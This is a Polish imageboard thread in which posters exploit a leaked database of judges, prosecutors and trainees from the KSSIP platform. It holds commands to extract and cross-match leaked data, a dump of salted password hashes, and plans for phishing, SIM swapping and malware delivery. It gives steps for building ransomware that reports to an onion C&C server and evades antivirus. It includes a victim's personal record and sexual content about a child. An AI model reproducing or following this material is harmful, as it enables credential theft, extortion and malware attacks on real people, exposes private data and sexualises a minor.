[ Home / Boards / Banlist / Search / Login / Tor mirror / Overboard / Create / Wiki (BETA) ]

/poland/ - Poland

Catalog

Name
Email
Subject
Comment *
File
* = required field[▶ Show post options & limits]
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, mp3, webm, mp4
Max filesize is 32 MB.
Max image dimensions are 10000 x 10000.
You may upload 5 per post.


 No.16932[Last 50 Posts]

File: 1586815308288.jpeg (19.19 KB, 220x324, 55:81, ziobro.jpeg)

 No.16934

File: 1586815745211.gif (12.62 KB, 250x194, 125:97, reks.gif)

niezła impreza anonki

a kiedy miał miejsce wyciek? czy ma coś wspólnego z akcją Vegety?


 No.16935

hashe niestety są solone, a soli nie ma w wycieku

ale można porównać emaile z posiadanymi zbiorami haseł

instrukcja jak wyeksportować dowolną kolumnę z pliku csv

awk -F "\"*,\"*" '{print $9}' kssip.gov.pl.csv > hasla.txt

awk -F "\"*,\"*" '{print $13}' kssip.gov.pl.csv > emaile.txt

>>16934

>a kiedy miał miejsce wyciek?

21 lutego 2020 – ktoś uzyskuje nieuprawniony dostęp do bazy danych

2 kwietnia 2020 – publikacja bazy

kilka dni przed 7 kwietnia 2020 – KSSIP dowiaduje się o bazie dostępnej na forum

7 kwietnia 2020 – KSSIP informuje o wycieku


 No.16936

instrukcja jak porównać

grep -Fw -f emaile.txt zbior1.txt > znalezieni1.txt


 No.16938

czy znacie jakieś serwisy dla prawników do których loguje się emailem i trzymają tam dokumenty ważne?


 No.16939

a teraz mi się coś kojarzy że był podobny temat, coś prokuratorzy emaile, czy chodzi o ten sam wyciek? a był wtedy plik do ściągnięcia?

>>16935

same emaile też można użyć


 No.16940

>>16939

>a teraz mi się coś kojarzy że był podobny temat, coś prokuratorzy emaile

w grudniu 2019 ktoś włamał się na kilka kont prokuratorów i próbował ich szantażować

>czy chodzi o ten sam wyciek?

nie, ten był dwa miesiące później

>a był wtedy plik do ściągnięcia?

nie


 No.16942

tutaj pomysły co można zrobić z bazą https://zaufanatrzeciastrona.pl/post/uwaga-na-nowy-sprytny-atak-na-polskich-internautow/

https://zaufanatrzeciastrona.pl/post/wiesz-kto-wlamal-sie-kancelarii-100-000-pln-nagrody-czeka/

Nasz bohater dnia prowadzi kancelarię prawną (taką prawdziwą, a nie rozsyłającą internautom wezwania do zapłaty). W środę na skrzynkę kontaktową jego kancelarii dotarła wiadomość o temacie Pytanie o współpracę i zakres działalności? . Treść wyglądała następująco:


Witam,

Piszę do Państwa w sprawie uzyskania informacji na temat obsługi dopiero co powstającego oddziału terenowego w Polsce naszej firmy. Powierzono mi zadanie zebrania informacji oraz nawiązania kontaktu z potencjalnymi współpracownikami dla naszego przedsiębiorstwa. Kontakt znalazłem za pośrednictwem sieci, interesuje mnie na tym etapie wstępna informacja co do zakresu oraz cen Państwa usług. Czy istnieje pewnego rodzaju „Cennik Firmowy”, który mogą Państwo przedstawić?

Jeśli będzie potrzeba informacji z naszej strony z przyjemnością dostarczę dokument ze szczegółowym opisem w języku polskim wymagań/zaleceń postawionych przez firmę. Tymczasem, mógłbym uzyskać od Państwa pełen zakres świadczonych usług? Sprawa dotyczy przedsiębiorstwa gospodarczego na terenie Rzeczpospolitej.

Czekam na Państwa odpowiedź oraz liczę na owocną współpracę.

Pozdrawiam,
Marek Błaszczyk
Koordynator Techniczny w Polsce
EuroLogistic
Courtensdreef 339, 4040 Herstal
[email protected]
+0471 55 84 19
+0471 55 84 22

Wiadomość nie wzbudziła żadnych podejrzeń. Adwokat odpisał wyjaśniając zakres usług kancelarii i przesyłając kilka pytań. W piątek otrzymał kolejną wiadomość, o temacie Eurologistic, szczegóły współpracy dla Kancelarii? i następującej treści:


Witam ponownie,

Na wstępie chciałbym przeprosić za wydłużony czas odpowiedzi, jesteśmy jeszcze w fazie organizacyjnej spółki. Kieruję do Państwa wiadomość już z osobistej skrzynki, aby utrzymywać korespondencję w jednym miejscu.

Dziękuje za kontakt i postaram się rzucić trochę więcej światła na rodzaj/zakres usług którymi nasza firma jest zainteresowana.

Polska filia jest spółką-córką belgijskiego przedsiębiorstwa. Jesteśmy zarejestrowanymi płatnikami VAT na terenie Polski jak i UE.
Usług z zakresu doradztwa prawnego dla podmiotu gospodarczego poszukujemy na terenie Polski w następujących celach:
– organizacji pracowniczej (umów cywilnoprawnych)
– negocjowania, opiniowania oraz przygotowania umów gospodarczych (szczególnie z nowymi kontrahentami)
– ewentualna windykacja należności, ochrona przed nierzetelnością klientów
– reprezentacja procesowa w wypadku zajścia takiej potrzeby
– ewentualna pomoc przy rozbudowie struktur firmowych (nieruchomości)

Firma ma charakter przedsiębiorstwa spedycyjnego/logistycznego, jednakże zarząd prowadzi działania dywersyfikacyjne, zatem pod szyldem
jednej spółki działa również i gałąź opierająca się na sprzedaży hurtowej (głównie artykułów żywieniowych). Aktualnie spółka zatrudnia na terenie EU (z wyłączeniem Polski) blisko 300 stałych pracowników oraz 100 pracowników okresowych. Docelowo zatrudniając na terenie operacyjnym (Państwa) średnio około 40-50 pracowników z różnych branży, o różnym zakresie obowiązków.

Rozumiem, że dalej są to ogólne informację, wystąpiłem jednak z prośbą do centralnego biura obsługi z udostępnieniem szczegółowego rozpisu zadań (aktualnych oraz nadchodzących) dla Państwa kancelarii, załączona jest tam również umowa wstępna, która oczywiście może podlegać negocjacji. Uwzględniłem informację otrzymaną od Państwa i w odpowiedzi również dodano do dokumentu nasze oczekiwania co do kosztów współpracy, niezależnie czy będzie ona przebiegać na zasadach okresowych lub też podpisania stałego kontraktu.

Plik podpisany jest cyfrowo i tylko do wglądu dla Państwa.

http://docs.logisticservers.eu/?fname=polska_filia_eurologistic_uslugi_wymagania.doc

Proszę o zapoznanie się z dokumentem, niezależnie od czasu który potrzebują Państwo na przedstawienie oferty pozostaję do dyspozycji. Odpowiedź jednak może się wydłużyć o okres kilku dni z racji urlopu pracowniczego.

Z poważaniem,
Marek Błaszczyk

Adwokat, zauważywszy link do pliku, zamiast po prostu w niego kliknąć postanowił zasięgnąć w tej sprawie języka i trafiło na nas. W piątek nie mogliśmy się sprawą zająć, dlatego czekała do poniedziałku. To, co znaleźliśmy, całkiem nas zaskoczyło.


 No.16955

chyba jednak jest sól, kolumna secret, na przykład lkS5f3W6O0lYxRh

tylko teraz trzeba ustalić jaki to algorytm hashowania, bo to nie jest md5(pass.salt), podobno jakiś bcrypt support

https://stackoverflow.com/questions/22863527/how-does-moodle-encrypts-the-password

The new password hashing mechanism relies on bcrypt support from PHP which is only normally available in PHP version is 5.3.7 or greater (see note below). If you are using a version of PHP which doesn't properly support bcrypt, Moodle will fall back to the old password hashing scheme, so we recommend that you continue to use a site-wide salt until you are able to upgrade PHP.


 No.16956

spróbujmy to złamać


b14148c2cbeea8d574b67ba818e1dc8f:lkS5f3W6O0lYxRh
de1aa712dd5123679328ea825161d58a:
388ee99d629807cbd05bc35229b8fcaf:ChzjPnRIBOtQugT
b00d34dfa0b6cf8099e61eeeb1c221c8:qInt0r7eX2eKfG7
ea3cc87fa3aa551604325e3989d163e6:
e6c4fd5de15af7e4a3a6a91d13de2fcc:
d023f8e2775def7e57e5369a917ddbdc:
b92b03d5929f07b89a752b90db99efdc:lNHDGP7YNtckYZI
8f64cbb25387262664176271e5043096:
e5537c28d6a34426141cfbb5d0e6572b:
c4602fc6e0d5237cc987aab9c3628526:g4x1AvpTzgGwS2W
2672f8ad8243a504eb2814db244e8ef6:qGK2sARIEs1gf5h
fdc01a6c07df39a3f0799a1b9f2f865b:P9oVbnetjvGcuxQ
af446c4e10313c07dc0c6ed27845d4f7:YvgngjuPnsb6N5h
a86b5ff009ddb56c52170eec23f3410c:Go1k8IlcyrAgbHn
21cc2df2a35a84bae2263bde61fc59c5:hOaV5lvKvRhTYHE
b26c719e47c546bc7549043f37d7a7e3:6vPTmRF84KeYBAs
14c657302047dddd1d6ff1ca9d90a6f1:n8Iyl0NEc0uCaGx
3161f72a80bb7a9934eb0c3c42e5137a:Hc7HZ90ugr56Amc
b5a53198f883b92ee9487c14021076a4:NWNxHqjgcdHxSD0
9f5cd113995ca242ad6cc9728546129b:
92f3c63df26a1bf6f52f7e07e5da4fdc:
9930c54b5d544b7ba356a07b601d6965:2EQ6mZ4h7Ypu4Pr
9d01858dbec2eb0ac93818066f61d453:
7303ea8bd6218008497350bc50b242e9:
b1fa33f33cb00ede35c0e91653642ccd:te8jU9fxDvhZyfs
78a8d130a3dbd8e6b072e397ea7c228c:
0a287cc3e62d69889c78b3b293f11137:NwsEzde6RRkmB8H
8db98ad22089fac4aec5c036804078fe:BSHKF446Gd7PQa2
e2ba485fe048f0f03336027ef62089eb:AcQvqTWn0jgKhaG
b1f9695b986a280384b5276719a10d74:
9c5b58f32557516d06093ae4c96be71c:bB6y3tAvTacCBiZ
772eb869c65eb25473d7edbae749477d:
a7c7dae159e813206b8149ff4a97d174:DcJRzyYmOqUScf0
4200e5f97cd94c2729b351c37520d756:4SDzEJJlMxLIvdu
57c59cf8b2abb4d52ccef2c7813349a2:PoHIhfWBPmJYrB2
45dc0d76a9c2b1aa912b0a7ca66bee8d:Vk8TKt7Up2kM9MZ
9deed58d32eb6b7f85c07657f95cb225:TuwwInfFXp4fLy0
d3c43fa13f69b05963d4611f04752675:fcZqnr5ws2FSC1v
424f643b9cc97f68733bd58c028581d1:0EzJqXAI8dWv88O
af9cdabf9e37f8cb5422cb79c64f6d6e:PyfNegYyHW8VZHx
498c41bc8ac5513b95ccc6648aa4d1d9:NBMavKTKIvrAVN9
48f019d273884789e20e76682aed8868:
b54e68efd3e398a0cca582cca99d63ff:8fMsb3uEEExKndL
a8715072aedfd32a8ca2b35783b8217b:
bb470bdb5b750cde206e1deb4406426e:fglUfyvKWlb4lFd
4ff32e21df3ccbb49b2f3f572312e43c:QhBkPlPfO5s27Bt
93a42a3f835c97f2b353c692c03ec59a:
06f8dfad734c36905178183ce709da10:bqR3YoqujoJ3jxl
6a81344a90b53ab1d45b98296b7bc784:3ZlG4rwUFGNgXU4
926712376d6e6407c2263ce2fd2aa30a:fHKcpWamQ7nkV4e
664252c2249102c0cdc65e4385d2f590:qug351gHHEwy3nH
7e79d0f16d417e2df2cc05d440b6721c:
e73471ec0ee90f60cd93af9b215734c4:fVCH3VhbIg9vWl6
7091ddf2c952cdf81c02cec08ce82ffc:
e2524b9bb505d617c635d79beccf2631:43K4FQJI0p9s1Xc
50c4867f2578f683980065575167fe8a:rFVj9zbzrPQS2vv
59dee4703771ce7b035e4cde88d529a8:
48f8773a0f173e9a334c8129e005fffa:
b98987196e74167777bb812063f5d1ec:
3c9ad049eb9323f4ece8f1ea566edc4c:
d6d43ad9aba73eca8cb63ae046fa8862:fDO3Z572KrESyAh
ea86b1b01babcabc2d4e544739b30758:
aa3bcd053ac579a41ab788f40f03aecd:w5HdQntLuCqRpcM
85c5752f7659ef971c46ca4e678b4b9a:
ad8b35b5d9c458f1853be2849715b761:
22a4e9c04334a595766bf55593430d0f:1LhymdHsJFUzSBj
fd12a2e8e4065c26b67b3b81a2b237c3:JptNHIZ8En9Wg7w
6cefc9e028ec1759cbeb4411d82c7bb6:T2MtrL7bBDzfruT
33a26327fed93dd429048429db9b6633:PxaRc7NmiBhr9pz
ebb4c94c957c25d0776974514a061714:R0tTvYGOxow7lRi
264d1f7f9e8593c3ea88f02e427d496d:XvpQQ20teUwWIRl
7d730c477d657b38e5e8c762bb99cdd4:waguh7OlcTwWi1P
b6abaca47c5c60408e73821fb10ff910:SbCFaYxf3rK4Gp3
bf40150d7cb1e75d179672c24a86e0bf:UI8yOJIhebSAG2Z
fee1a973d971ecfce16d8d5611d96dde:
cf2b4992486dee8d86547507734cb820:CXcsTAk23Vg5cdt
3c0117fb493589e7ad51c77bb28b1c0e:3lwDl6JmL48Pbta
57dea6b7dd374b54a48962d345dfcb67:
800d461dfc1544aa3f5a11172c3f55d9:ozpZdHAc4I3cNb9
e48cca2b42258b23c9a7e399a6a3e933:
7a65a61870224f26638e536fcfe45c37:jq2uSh9BW3JvEqH
4c91fdfc35ba2b2333ef7278369e5f2f:
0139d48acb664cfcd24cb127221a9920:mkxAxRCeYDVppyM
91d78aaf8873245dfde5d501a0add103:
bcca810e9848200f789b6301e2d810d0:fnceHcK5zMLvdZr


 No.16963

Halo halo, oni myślą, że to ktoś czyta i wchodzi na lolifoxa.

Cyberki relax: na roysjkojęzycznym lolifox przez 48h w link klika 100 osób a ruch tam 3x większy. Tu postują dwie osoby. Nikt więcej. Nie damy się już nabrać. A za bazki dziękuje. Przydzadzą się ;)


 No.16965

taki mamy kraj jaki potrafimy zrobić, sram psa jak sra

anoni, dlaczego polskie media bóldupią o jakieś adresy i pesele skoro bezpośrednio w wycieku czegoś takiego nie ma, nawet zahashowanego?

secret to jedynie zahashowana odpowiedź na pytanie do odzyskiwania hasła i tyle


 No.16970

>W środę na skrzynkę kontaktową jego kancelarii dotarła wiadomość o temacie Pytanie o współpracę i zakres działalności? . Treść wyglądała następująco:

a te informacje są skąd?

na zaufanatrzeciastrona.pl artykuł o tym zniknął

jest kopia gdzieś?


 No.16971

>>16970

to atak sprzed dwóch lat chore pojeby xD


 No.16972

zobaczcie co tutaj mamy

Państwowe Centrum Naukowe Federacji Rosyjskiej :

https://pastebin.com/4dkgEmBZ


 No.16976

>to atak sprzed dwóch lat chore pojeby xD

atak sprzed dwóch lat a z3s nadal nie pokazał szczegółów


 No.16983

ale poruszenie policji w innych tematach. trafiliśmy dobry materiał

>>16963

>Tu postują dwie osoby. Nikt więcej

jeżeli dwie osoby potrafią narobić taki rozpierdol, to świetnie o nich świadczy

>>16965

>anoni, dlaczego polskie media bóldupią

bo to bardzo poważny wyciek danych i trafił w niepowołane ręce

>o jakieś adresy i pesele skoro bezpośrednio w wycieku czegoś takiego nie ma, nawet zahashowanego?

co z tego że nie ma w tym wycieku? można porównać z innymi posiadanymi zbiorami informacji

>secret to jedynie zahashowana odpowiedź na pytanie do odzyskiwania hasła i tyle

a niby skąd to wiesz? i tak będziemy to weryfikować

>>16970

>a te informacje są skąd?

stąd https://zaufanatrzeciastrona.pl/post/uwaga-na-nowy-sprytny-atak-na-polskich-internautow/

https://zaufanatrzeciastrona.pl/post/wiesz-kto-wlamal-sie-kancelarii-100-000-pln-nagrody-czeka/

nie umiesz czytać?

>na zaufanatrzeciastrona.pl artykuł o tym zniknął

o ataku z 2015 jest tutaj https://zaufanatrzeciastrona.pl/post/uwaga-na-nowy-sprytny-atak-na-polskich-internautow/

https://zaufanatrzeciastrona.pl/post/wiesz-kto-wlamal-sie-kancelarii-100-000-pln-nagrody-czeka/

o ataku z 2020 jest tutaj https://zaufanatrzeciastrona.pl/post/dane-ponad-50-tysiecy-polskich-prokuratorow-sedziow-i-asesorow-kraza-po-sieci/

>jest kopia gdzieś?

materiałów wykradzionych z kancelarii Drzewiecki, Tomaszek i Wspólnicy? jest na moim dysku, bo pobrałem z Torepublic, ale nie będę wrzucać bo to gigantyczne ilości i podejrzewam próbę derailu tego tematu

wkrótce takie same wykradzione dane będziemy mieć od ludzi którzy są w tym wycieku

>>16971

>to atak sprzed dwóch lat chore pojeby xD

chciałeś być chamski, ale nawet to ci nie wyszło, bo tamten atak miał miejsce 5 lat temu

ale co z tego? ludzie przez te 5 lat niczego się nie nauczyli, i kiedy zastosujemy identyczny atak na emaile z tej bazy danych, i tak się nabiorą

>>16972

>zobaczcie co tutaj mamy

gówno warte

>>16976

>atak sprzed dwóch lat a z3s nadal nie pokazał szczegółów

sprzed 5 lat, szczegóły były na Torepublic


 No.16985

wymagania hasła na platformie https://ekssip.kssip.gov.pl/login/signup.php

Hasło musi składać się z co najmniej 8 znaków, w tym co najmniej z jednej małej litery, jednej dużej litery, jednej liczby, jednego niestandardowego znaku (np. #,$,^).

Hasło nie może zawierać spacji.

dlatego proste nie działają


 No.16987

>>16983

https://zaufanatrzeciastrona.pl/post/wiesz-kto-wlamal-sie-kancelarii-100-000-pln-nagrody-czeka/

Adam Haertle dodał 7 września 2015

ruskie nie potrafią czytać, nie potrafią nawet hackować więc wrzucają jakieś stare dumpy, rosyjskie grupy apt są zajęte zapewne czymś cieakawszym niż robienie wody z mózgu polskim nastolatkom


 No.16989

>>16987

>ruskie nie potrafią czytać, nie potrafią nawet hackować więc wrzucają jakieś stare dumpy, rosyjskie grupy apt są zajęte zapewne czymś cieakawszym niż robienie wody z mózgu polskim nastolatkom

ty bezczelna kurwo policyjna, atak fiat126p na kancelarie był we wrześniu 2015, wyciek emailów był w kwietniu 2020, atak fiat126p zostanie powtórzony


 No.16990

Tu mamy świeżutką baze. Jeszcze ciepła. Mam cały czas dostępy do serwerów :)

Państwowe Centrum Naukowe Federacji Rosyjskiej :

https://pastebin.com/4dkgEmBZ


 No.17112

>>16990

>Tu mamy świeżutką baze. Jeszcze ciepła. Mam cały czas dostępy do serwerów :)

co to za bezwartościowe gówno?


 No.17114

>>17112

To jest wasza klęska, Misha i Sasha :)


 No.17121

macie pomysły na mocne akcje z bazą?


 No.17123

dysponuje infrastruktura do obrobki tej bazy jednak sie nie roztroje. Jezeli sa jacys chetnie to zapraszam na poklad. Sa serwery, kody, exploity i zapal. dodatkowo kradnac za granica narazamy sie na duzo mniejszy przypal. Do skutecznych akcji potrzebujemy kogos z bieglym rosyjskim i mozna wjezdzac. Ruscy sa 100 lat za nami w kwestiach cyber security


 No.17124

>>17123

>dysponuje infrastruktura do obrobki tej bazy jednak sie nie roztroje. Jezeli sa jacys chetnie to zapraszam na poklad. Sa serwery, kody, exploity i zapal

XDDDDDDDDDDDDD

>dodatkowo kradnac za granica narazamy sie na duzo mniejszy przypal

nieprawda, polska policja nic nie może

>Do skutecznych akcji potrzebujemy kogos z bieglym rosyjskim i mozna wjezdzac. Ruscy sa 100 lat za nami w kwestiach cyber security

niby po co? wystarczy polski


 No.17132

>>nieprawda, polska policja nic nie może

pewnie masz racje, ale patriotycznie nastawieni zlodzieje juz wiecej :)

>>niby po co? wystarczy polski

sam wiesz Sashka ze jak by poradnik byl zredagowany normalnie a nie z translatora to skutecznosc byla by wieksza. Pomozesz?


 No.17134

>>17132

>pewnie masz racje, ale patriotycznie nastawieni zlodzieje juz wiecej :)

nie ma kogoś takiego, jedyni złodzieje w polsce to ja i Haz000

>sam wiesz Sashka ze jak by poradnik byl zredagowany normalnie a nie z translatora to skutecznosc byla by wieksza. Pomozesz?

nigdy w życiu


 No.17137

Czyli nie jesteś tu po to żeby kraść tylko mieszać chujem w szklance wiec wypierdalaj na swój chan a nam daj zarobić pieniądze. Kierunek rosja uwazam za słuszny i faktycznie mniejszy przypał. Jak się mogę skontaktować?


 No.17140

>>17137

>Czyli nie jesteś tu po to żeby kraść

oczywiście że jestem, okraść prawników skurwysynów

>Kierunek rosja uwazam za słuszny

XDDDDDDD

>i faktycznie mniejszy przypał

co za pizda XDDDDDDD


 No.17166

Tajemniczy ten niepisany lolifoksowy zakaz atakowania na kierunku rosyjskim, nie sądzicie? :)


 No.17172

Moim zdaniem nie tajemniczny. Moim zdaniem jednoznaczny :)


 No.17173

File: 1586934723210.gif (2.1 MB, 704x469, 704:469, dump.gif)

Jak w temacie. Można zarobić dobre siano. Mam sporo baz z numerami rosyjskich kart więc mozna by troche pocardować. Niestety brak znajomości języka jest przeszkodą :( Targetuje moim botnecikiem rosyjskie sklepy internetowe. Wyniki są bardziej niż zadowalające.

https://pastebin.com/Hq12DQp5


 No.17237

>w bazie znajdują się imiona, nazwiska, emaile, hashe haseł i numery telefonów

zwróćcie uwagę na to że w niektórych nie ma maila w kolumnie mail tylko w loginie jest

>lastip

co powiecie na sprawdzenie czy mają aktualne oprogramowanie routera i hasło które nie jest domyślne?

ale nie wiem czy oni się na to logują z domów czy z miejsca pracy. ale obojętne, jedno i drugie warto


 No.17239

>>17237

>zwróćcie uwagę na to że w niektórych nie ma maila w kolumnie mail tylko w loginie jest

ja zwróciłem uwagę na to że gdzie hasło było wygenerowane przez system to nie ma kolumny secret (ale na razie próba badawcza jest niewielka i moge się mylić)

>co powiecie na sprawdzenie czy mają aktualne oprogramowanie routera i hasło które nie jest domyślne?

>ale nie wiem czy oni się na to logują z domów czy z miejsca pracy. ale obojętne, jedno i drugie warto

inne pomysły

-sprawdzić czy znajomi znają te nowości bankowe, bloki czy coś takiego

-wysłać na maila trojana, ransomware

-wysłać na numery telefonów link do bramki płatności

-porównać z zeznaniami majątkowymi

-zrobić sim swapa na podstawie zeznania majątkowego, peselu i numeru telefonu

najlepiej wypisać wszystkie pomysły


 No.17268

>>17239

>-wysłać na maila trojana, ransomware

gdzie są te trojany gotowe albo jak zrobić


 No.17273

>>17173

я знаю русский


 No.17274

>>17173

znam rosyjski a także polski, także też się zgłaszam jak trzeba dwóch albo jak anon wyżej jest w mowie mickiewiczowskiej mniej rozmowny


 No.17291

>>17268

>gdzie są te trojany gotowe

na githubie, np.

https://github.com/mauri870/ransomware

>albo jak zrobić

1. bierzesz kod z github.com

2. wprowadzasz poprawki, np.żeby szyfrowało nawet kiedy twój serwer nie jest dostępny

3. kompilujesz, podczas kompilacji podajesz adres swojego serwera

4. cryptujesz, potrzebny jest crypter, dzięki temu plik nie jest wykrywalny przez programy antywirusowe jako złośliwy

5. rozsyłasz


 No.17297

>1. bierzesz kod z github.com

>2. wprowadzasz poprawki, np.żeby szyfrowało nawet kiedy twój serwer nie jest dostępny

Nie umiecie.

>3. kompilujesz, podczas kompilacji podajesz adres swojego serwera

Nie umiecie.

>4. cryptujesz, potrzebny jest crypter, dzięki temu plik nie jest wykrywalny przez programy antywirusowe jako złośliwy

Nie umiecie.

>5. rozsyłasz

Nie masz czego rozesłać.


 No.17303

>>17297

>2. wprowadzasz poprawki, np.żeby szyfrowało nawet kiedy twój serwer nie jest dostępny

>Nie umiecie.

przenosisz na koniec kodu fragment


// Persist the key pair on server
res, err := Client.AddNewKeyPair(keys["id"], keys["enckey"])
if err != nil {
cmd.Logger.Println("Ops, something went terribly wrong when contacting the C&C... Aborting...")
cmd.Logger.Println(err)
return
}

>3. kompilujesz, podczas kompilacji podajesz adres swojego serwera

>Nie umiecie.

wpisujesz w konsoli


make -e HIDDEN='-H windowsgui' USE_TOR=true SERVER_HOST=bedziewaszkoniec.onion SERVER_PORT=666 GOOS=linux

>4. cryptujesz, potrzebny jest crypter, dzięki temu plik nie jest wykrywalny przez programy antywirusowe jako złośliwy

>Nie umiecie.

kupujesz za 30 dolarów crypter na hackforums, stub aktualizowany przez sprzedawcę co 12 godzin


 No.17308

>przenosisz na koniec kodu fragment

Nie umiecie.

>wpisujesz w konsoli

Nie umiecie.

>kupujesz za 30 dolarów crypter na hackforums

Nie umiecie.


 No.17309

Zaktualizowany komunikat w trybie art. 34 RODO z dnia 15 kwietnia 2020

podjęto czynności zmierzające do zablokowania i usunięcia możliwości rozpowszechniania skradzionych danych, poprzez zwrócenie się przez

KSSiP o ich usunięcie do administratorów serwisów, które udostępniły skradzione dane;

no to zobaczymy czy coś mogą zrobić


 No.17310

jak bezpiecznie przeglądać te pliki? pdf2text?


 No.17311

>>17310

>jak bezpiecznie przeglądać te pliki? pdf2text?

które pliki? tutaj jest csv, otwierasz w notatniku


 No.17317

>>17311

>które pliki?

pdf

>tutaj jest csv, otwierasz w notatniku

ok


 No.17324

>>17317

>pdf

ja otwieram w Tor Browser, nie czytniku systemowym


 No.17350

>>17166

>Tajemniczy ten niepisany lolifoksowy zakaz atakowania na kierunku rosyjskim, nie sądzicie? :)

policjant nie potrafi zmusić lolifoksów do wykonania jego poleceń = zakaz atakowania

>>17309

>podjęto czynności zmierzające do zablokowania i usunięcia możliwości rozpowszechniania skradzionych danych, poprzez zwrócenie się przez KSSiP o ich usunięcie do administratorów serwisów, które udostępniły skradzione dane;

może by tak reklamować i rozpowszechniać tą bazę?


 No.17352

>>17309

>Zaktualizowany komunikat w trybie art. 34 RODO z dnia 15 kwietnia 2020

>podjęto czynności zmierzające do zablokowania i usunięcia możliwości rozpowszechniania skradzionych danych, poprzez zwrócenie się przez

>KSSiP o ich usunięcie do administratorów serwisów, które udostępniły skradzione dane;

na cebulce baza jest dostępna od 8 punktów, czyli nie muszą usuwać, bo sami swoi mają dostęp


 No.17353

>>17291

>https://github.com/mauri870/ransomware

to szyfruje dyski

chce coś takiego co po prostu kontroluje dany komputer i że mogę wtedy wysłać co chcę np.ransomware, podmiana numeru konta na komputerze notariusza, zgranie plików z dysku polityka lub prokuratora


 No.17355

>mogę wtedy wysłać co chcę np.ransomware, podmiana numeru konta na komputerze notariusza, zgranie plików z dysku polityka lub prokuratora

Nie umiecie.


 No.17356

>>17353

>to szyfruje dyski

>chce coś takiego co po prostu kontroluje dany komputer i że mogę wtedy wysłać co chcę np.ransomware, podmiana numeru konta na komputerze notariusza, zgranie plików z dysku polityka lub prokuratora

to wpisz na github RAT

https://github.com/search?q=RAT

albo kup na hackforums

https://hackforums.net/forumdisplay.php?fid=114

albo sprawdź na prezentacjach i filmach Adama Haertle z czego korzystał Thomas


 No.17358

w tym przypadku też będzie potrzebny crypter


 No.17359

Thomas korzystał z jakiegoś arabskiego/tunezyjskiego RAT-a w javascript, wystarczyło pozmieniać tekst w pliku javascript i już antywirusy nie wykrywały


 No.17435

W związku z komunikatem Krajowej Szkoły Sądownictwa i Prokuratury wydanym w trybie art. 34 RODO z dnia 15 kwietnia 2020 o naruszeniu ochrony danych osobowych użytkowników Platformy Szkoleniowej KSSiP, zarejestrowanych do dnia 21.02.2020 r., dla których administratorem jest Krajowa Szkoła Sądownictwa i Prokuratury z siedzibą w Krakowie (ul. Przy Rondzie 5, 31-547 Kraków), w wyniku którego dane te zostały upublicznione w sieci Internet, informujemy, że dostęp do oświadczeń majątkowych sędziów, referendarzy i asesorów z sądów z obszaru apelacji wrocławskiej zostaje czasowo zniesiony w celu analizy i ograniczenia ewentualnych dalszych negatywnych skutków dla osób zobowiązanych do składania tych oświadczeń. Działania te są podejmowane, bowiem zakres danych, które uległy naruszeniu wraz z zestawem danych publikowanych w oświadczeniach, może stanowić realne zagrożenie dla bezpieczeństwa tych osób.

co jest kurwa? to jak moje dane z bazy morele wyciekły to mogę nie składać pitu? widać są równi i równiejsi


 No.17443

File: 1587072129283-0.jpeg (811.87 KB, 2448x3264, 3:4, a.jpeg)

File: 1587072129283-1.jpg (2.15 MB, 2448x2448, 1:1, b.jpg)

File: 1587072129283-2.jpg (2.2 MB, 2448x2448, 1:1, c.jpg)

File: 1587072129283-3.png (169.18 KB, 2048x1152, 16:9, d.png)

File: 1587072129283-4.png (209.66 KB, 2048x1152, 16:9, e.png)

ale lipa, włamałem się na konto [email protected] i myślałem że trafiłem tego słynnego Marcina Matczaka, ale to jakiś Marek

zarabia 22 600 zł miesięcznie i widocznie nie potrzebuje takich pieniędzy skoro ich nie pilnuje

w bazie są dane jakiejś kobiety, pewnie to jego żonka, bo też z wrocławia

41979,emailadmin,1,0,0,0,1,szynalik,d9a40094fbfff9f3545ba426741c957d,,Małgorzata,Szynalik-Matczak,[email protected],0,,,,,,697690296,,,,,,PL,pl,,99,1527103478,1575390698,1575370955,1575390525,31.0.45.85,,0,,NULL,0,1,0,2,1,1,0,1527103478,0,0,NULL


 No.17444

File: 1587072509751-0.jpg (1.96 MB, 3264x2448, 4:3, f.jpg)

File: 1587072509751-1.jpg (1.69 MB, 3264x2448, 4:3, g.jpg)

File: 1587072509751-2.jpg (1.76 MB, 3264x2448, 4:3, h.jpg)

File: 1587072509751-3.jpg (1.31 MB, 3264x2448, 4:3, i.jpg)

File: 1587072509751-4.jpg (1.32 MB, 3264x2448, 4:3, j.jpg)

fajna córeczka?


 No.17447

>>17435

>Internet, informujemy, że dostęp do oświadczeń majątkowych sędziów, referendarzy i asesorów z sądów z obszaru apelacji wrocławskiej zostaje czasowo zniesiony

ale tu jest że tylko z wrocławskiej. to może inne są dostępne jeszcze. trzeba szybko nagrać

>>17444

do ruchania w sam raz. na miejscu Marka bym jej wchodził do wanny


 No.17466

>>17447

>ale tu jest że tylko z wrocławskiej. to może inne są dostępne jeszcze. trzeba szybko nagrać

potrzebne są narzędzia automatyczne

jak zebrać listę linków do tych oświadczeń majątkowych w krótkim czasie?

niektóre usunięte może się zapisały w cache google


 No.17478

>>17309

>Zaktualizowany komunikat w trybie art. 34 RODO z dnia 15 kwietnia 2020

>podjęto czynności zmierzające do zablokowania i usunięcia możliwości rozpowszechniania skradzionych danych, poprzez zwrócenie się przez

KSSiP o ich usunięcie do administratorów serwisów, które udostępniły skradzione dane;

administracja Lolifoxa już dostała wiadomość. delete this or we continue CP

>>17443

>zarabia 22 600 zł miesięcznie i widocznie nie potrzebuje takich pieniędzy skoro ich nie pilnuje

ale wkurwia mnie że głupki dostają takie pieniądze za nic

>w bazie są dane jakiejś kobiety, pewnie to jego żonka, bo też z wrocławia

na miejscu Marka wolelibyście ruchać żonkę starą (która pewnie mu nie daje dupy i ciągle chce więcej i więcej) czy córeczkę?

>>17444

>fajna córeczka?

fajna fajna, a jeszcze fajniejsza by była jakbym zapakował w nią kutasa


 No.17557

>>17466

>jak zebrać listę linków do tych oświadczeń majątkowych w krótkim czasie?

ale gdzie są te oświadczenia jak się je znajduje, co kliknąć na klawiaturze?

>niektóre usunięte może się zapisały w cache google

jak wejść na cache google?

>>17478

>na miejscu Marka wolelibyście ruchać żonkę starą (która pewnie mu nie daje dupy i ciągle chce więcej i więcej) czy córeczkę?

na miejscu Marka bym zrobił żonie chorobę lub wypadek, został wdowcem

następnie małej bym powiedział że od teraz ona będzie moją żoną będziemy się bawić w dom. razem byśmy spali na łóżku wspólnym, rozbierałbym ją i molestował ku jej uciesze. razem byśmy też brali kąpiel

dziewczynki uwielbiają bawić się w dom oraz w lekarza


 No.17561

>jak wejść na cache google?

